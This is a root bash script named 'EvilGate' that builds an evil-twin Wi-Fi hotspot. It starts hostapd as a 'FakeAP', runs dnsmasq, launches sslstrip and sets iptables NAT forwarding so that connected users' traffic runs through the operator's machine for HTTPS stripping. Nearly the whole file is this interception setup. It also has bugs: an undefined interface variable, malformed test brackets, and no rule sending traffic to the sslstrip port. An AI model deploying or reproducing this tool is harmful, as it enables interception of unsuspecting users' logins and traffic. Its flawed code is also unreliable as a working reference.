#!/usr/bin/bash
# EvilGate by Pascal3366

Exit() {
  echo "Cleaning up stuff..."
  killall hostapd
  killall sslstrip
  killall dnsmasq
  stop_service "nginx"
  start_service "NetworkManager"
  exit
}

trap Exit SIGINT

if [ "$EUID" -ne 0 ]
  then echo "This script has to be run as root"
  exit
fi

SSLSTRIP_PORT=10000
INTERFACE1="enp1s0f1"
INTERFACE12="wlp2s0"

detect_init() {
  # init process is pid 1
  INIT=`ls -l /proc/1/exe`
  if [[ $INIT == *"upstart"* ]]; then
    SYSTEMINITDAEMON=upstart
  elif [[ $INIT == *"systemd"* ]]; then
    SYSTEMINITDAEMON=systemd
  elif [[ $INIT == *"/sbin/init"* ]]; then
    INIT=`/sbin/init --version`
    if [[ $INIT == *"upstart"* ]]; then
      SYSTEMINITDAEMON=upstart
    elif [[ $INIT == *"systemd"* ]]; then
      SYSTEMINITDAEMON=systemd
    fi
  fi

  if [ -z "$SYSTEMINITDAEMON" ]; then
    echo "WARNING: Unknown distribution, assuming defaults - this may fail." >&2
  fi
}

detect_package_manager() {
  if [ -f /usr/bin/pacman ]; then
    PACKAGEMANAGER=pacman
  elif [ -f /usr/bin/apt ]; then
    PACKAGEMANAGER=apt
  elif [ -f /usr/bin/yum ]; then
    PACKAGEMANAGER=yum
  elif [ -f /usr/bin/dnf ]; then
    PACKAGEMANAGER=dnf
  elif [ -f /usr/bin/emerge ]; then
    PACKAGEMANAGER=portage
  fi
}

install_package() {
  if [ "$PACKAGEMANAGER" = "pacman" ]; then
    pacman -S $1
  elif [ "$PACKAGEMANAGER" = "apt" ]; then
    apt install $1
  elif [ "$PACKAGEMANAGER" = "yum" ]; then
    yum install $1
  elif [ "$PACKAGEMANAGER" = "dnf" ]; then
    dnf install $1
  elif [ "$PACKAGEMANAGER" = "portage" ]; then
    emerge $1
  fi
}

check_requirements() {
  if [ -f /usr/bin/hostapd ]; then
    echo "[hostapd]: installed"
    HOSTAPD=true
  else
    echo "[hostapd]: missing"
    HOSTAPD=false
  fi

  if [ -f /usr/bin/nginx ]; then
    echo "[nginx]: installed"
    NGINX=true
  else
    echo "[nginx]: missing"
    NGINX=false
  fi

  if [ -f /usr/bin/sslstrip ]; then
    echo "[sslstrip]: installed"
    SSLSTRIP=true
  else
    echo "[sslstrip]: missing"
    SSLSTRIP=false
  fi
}

install_requirements() {
  if [ "$HOSTAPD" = false ]; then
    echo "Installing hostapd..."
    install_package "hostapd"
  fi

  if [ "$NGINX" = false ]; then
    echo "Installing nginx..."
    install_package "nginx"
  fi

  if [ "$SSLSTRIP" = false ]; then
    echo "Installing sslstrip..."
    install_package "sslstrip"
  fi
}

start_service() {
  if [ "$SYSTEMINITDAEMON" = "systemd" ]; then
    systemctl start $1
  elif ["$SYSTEMINITDAEMON" = "upstart" ]; then
    /etc/init.d/$1 start
  fi
}

stop_service() {
  if [ "$SYSTEMINITDAEMON" = "systemd" ]; then
    systemctl stop $1
  elif ["$SYSTEMINITDAEMON" = "upstart" ]; then
    /etc/init.d/$1 stop
  fi
}

detect_init
detect_package_manager

echo "Detected Init System:" $SYSTEMINITDAEMON
echo "Detected Package Manager:" $PACKAGEMANAGER
echo "Checking Requirements..."
check_requirements
echo "Installing missing Requirements..."
install_requirements
echo "Starting nginx"
start_service "nginx"
echo "Starting sslstrip"
nohup sslstrip --listen=$SSLSTRIP_PORT &>/dev/null &
echo "Stopping NetworkManager"
stop_service "NetworkManager"

nmcli nm wifi off
rfkill unblock wlan

ifconfig $INTERFACE1 down
ifconfig $INTERFACE2 up
ifconfig $INTERFACE1 192.168.0.1 netmask 255.255.255.0 up
ifconfig $INTERFACE2 192.168.0.100 netmask 255.255.255.0 up

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $INTERFACE2 -j MASQUERADE
iptables --append FORWARD --in-interface $INTERFACE1 -j ACCEPT
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -A FORWARD -i $INTERFACE1 -o $INTERFACE2 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i $INTERFACE2 -o $INTERFACE1 -j ACCEPT

sysctl -w net.ipv4.ip_forward=1

echo "Launching DHCP + DNS Server dnsmasq..."
dnsmasq -C dnsmasq.conf &>/dev/null &
echo "Setting up FakeAP using hostapd..."
hostapd -B -d hostapd.conf &

read -p "Script is running press any key to cancel..."

Exit
